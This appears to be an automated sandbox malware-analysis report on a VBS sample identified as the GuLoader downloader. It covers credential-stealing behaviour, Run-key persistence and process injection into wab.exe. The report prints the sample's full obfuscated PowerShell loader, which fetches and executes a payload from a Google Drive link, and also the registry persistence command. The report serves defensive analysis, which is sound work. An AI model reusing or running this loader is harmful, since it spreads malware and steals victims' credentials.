Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2024 15:42
Static task
static1
Behavioral task
behavioral1
Sample
Swift 2024052130819616.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Swift 2024052130819616.vbs
Resource
win10v2004-20240426-en
General
-
Target
Swift 2024052130819616.vbs
-
Size
13KB
-
MD5
693d91041a54a578ada0c38a77634ee9
-
SHA1
13e0a6c85203356af7d11ff4a0e74a6b9637f466
-
SHA256
bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91
-
SHA512
110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb
-
SSDEEP
192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/5044-73-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 2168 powershell.exe 13 2168 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 3680 wab.exe 3680 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 784 powershell.exe 3680 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 784 set thread context of 3680 784 powershell.exe wab.exe PID 3680 set thread context of 2088 3680 wab.exe wab.exe PID 3680 set thread context of 5072 3680 wab.exe wab.exe PID 3680 set thread context of 5044 3680 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exewab.exewab.exepid process 2168 powershell.exe 2168 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 2088 wab.exe 2088 wab.exe 5044 wab.exe 5044 wab.exe 2088 wab.exe 2088 wab.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exewab.exepid process 784 powershell.exe 3680 wab.exe 3680 wab.exe 3680 wab.exe 3680 wab.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 5044 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 3680 wab.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 3936 wrote to memory of 4700 3936 WScript.exe cmd.exe PID 3936 wrote to memory of 4700 3936 WScript.exe cmd.exe PID 4700 wrote to memory of 1428 4700 cmd.exe PING.EXE PID 4700 wrote to memory of 1428 4700 cmd.exe PING.EXE PID 3936 wrote to memory of 2168 3936 WScript.exe powershell.exe PID 3936 wrote to memory of 2168 3936 WScript.exe powershell.exe PID 2168 wrote to memory of 4224 2168 powershell.exe cmd.exe PID 2168 wrote to memory of 4224 2168 powershell.exe cmd.exe PID 2168 wrote to memory of 784 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 784 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 784 2168 powershell.exe powershell.exe PID 784 wrote to memory of 4372 784 powershell.exe cmd.exe PID 784 wrote to memory of 4372 784 powershell.exe cmd.exe PID 784 wrote to memory of 4372 784 powershell.exe cmd.exe PID 784 wrote to memory of 3680 784 powershell.exe wab.exe PID 784 wrote to memory of 3680 784 powershell.exe wab.exe PID 784 wrote to memory of 3680 784 powershell.exe wab.exe PID 784 wrote to memory of 3680 784 powershell.exe wab.exe PID 784 wrote to memory of 3680 784 powershell.exe wab.exe PID 3680 wrote to memory of 3692 3680 wab.exe cmd.exe PID 3680 wrote to memory of 3692 3680 wab.exe cmd.exe PID 3680 wrote to memory of 3692 3680 wab.exe cmd.exe PID 3692 wrote to memory of 3408 3692 cmd.exe reg.exe PID 3692 wrote to memory of 3408 3692 cmd.exe reg.exe PID 3692 wrote to memory of 3408 3692 cmd.exe reg.exe PID 3680 wrote to memory of 2088 3680 wab.exe wab.exe PID 3680 wrote to memory of 2088 3680 wab.exe wab.exe PID 3680 wrote to memory of 2088 3680 wab.exe wab.exe PID 3680 wrote to memory of 2088 3680 wab.exe wab.exe PID 3680 wrote to memory of 4248 3680 wab.exe wab.exe PID 3680 wrote to memory of 4248 3680 wab.exe wab.exe PID 3680 wrote to memory of 4248 3680 wab.exe wab.exe PID 3680 wrote to memory of 5072 3680 wab.exe wab.exe PID 3680 wrote to memory of 5072 3680 wab.exe wab.exe PID 3680 wrote to memory of 5072 3680 wab.exe wab.exe PID 3680 wrote to memory of 5072 3680 wab.exe wab.exe PID 3680 wrote to memory of 5044 3680 wab.exe wab.exe PID 3680 wrote to memory of 5044 3680 wab.exe wab.exe PID 3680 wrote to memory of 5044 3680 wab.exe wab.exe PID 3680 wrote to memory of 5044 3680 wab.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\System32\cmd.execmd.exe /c ping 6777.6777.6777.677e2⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\PING.EXEping 6777.6777.6777.677e3⤵
- Runs ping.exe
PID:1428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"3⤵PID:4224
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"4⤵PID:4372
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
